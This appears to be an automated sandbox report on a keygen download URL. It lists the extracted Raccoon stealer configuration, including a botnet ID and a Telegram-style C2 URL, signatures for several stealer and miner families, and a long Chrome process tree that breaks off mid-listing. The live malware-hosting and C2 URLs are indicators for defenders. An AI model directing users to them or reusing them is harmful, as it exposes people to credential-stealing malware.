Resubmissions

18-04-2021 09:11

210418-l2b52pc3js 10

Analysis

  • max time kernel
    1799s
  • max time network
    1420s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    18-04-2021 09:11

General

  • Target

    https://keygenit.com/d/59def7ae481psn8p58q.html

  • Sample

    210418-l2b52pc3js

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2424
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2372
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/59def7ae481psn8p58q.html
            1⤵
            • Enumerates system info in registry
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4060
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0x64,0x7ffaf7b24f50,0x7ffaf7b24f60,0x7ffaf7b24f70
              2⤵
                PID:604
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
                2⤵
                  PID:2116
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2148 /prefetch:8
                  2⤵
                    PID:2456
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2396
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2552 /prefetch:1
                    2⤵
                      PID:2804
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
                      2⤵
                        PID:3984
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
                        2⤵
                          PID:1120
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
                          2⤵
                            PID:3832
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
                            2⤵
                              PID:3404
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
                              2⤵
                                PID:4164
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
                                2⤵
                                  PID:4520
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4636
                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                  2⤵
                                    PID:4704
                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x1ec,0x7ff611aaa890,0x7ff611aaa8a0,0x7ff611aaa8b0
                                      3⤵
                                        PID:4732
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:8
                                      2⤵
                                        PID:4796
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
                                        2⤵
                                          PID:4892
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5448 /prefetch:8
                                          2⤵
                                            PID:4948
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
                                            2⤵
                                              PID:4992
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:8
                                              2⤵
                                                PID:5028
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5040
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:8
                                                2⤵
                                                  PID:5100
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
                                                  2⤵
                                                    PID:3840
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:8
                                                    2⤵
                                                      PID:4252
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6992 /prefetch:8
                                                      2⤵
                                                        PID:4228
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7112 /prefetch:8
                                                        2⤵
                                                          PID:2816
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6680 /prefetch:8
                                                          2⤵
                                                            PID:4512
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
                                                            2⤵
                                                              PID:4652
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
                                                              2⤵
                                                                PID:2160
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
                                                                2⤵
                                                                  PID:4716
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:8
                                                                  2⤵
                                                                    PID:4036
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:8
                                                                    2⤵
                                                                      PID:4728
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:8
                                                                      2⤵
                                                                        PID:4776
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:8
                                                                        2⤵
                                                                          PID:4884
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
                                                                          2⤵
                                                                            PID:4808
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:8
                                                                            2⤵
                                                                              PID:4632
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
                                                                              2⤵
                                                                                PID:4952
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                2⤵
                                                                                  PID:5048
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5052
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3992
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5108
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4332
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6016 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4120
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6212 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1824
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6208 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1424
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6220 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1164
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:4724
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:4048
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7236 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4804
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7220 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:4388
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7476 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:520
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:4928
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4684
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:4980
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7228 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:3160
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4120
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7604 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4652
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7716 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5004
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7308 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4944
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=772 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4744
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4136
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:4328
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:4420
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
                                                                                                                          2⤵
                                                                                                                            PID:2708
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1628,5434154926835000984,11432150328317206047,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4872
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
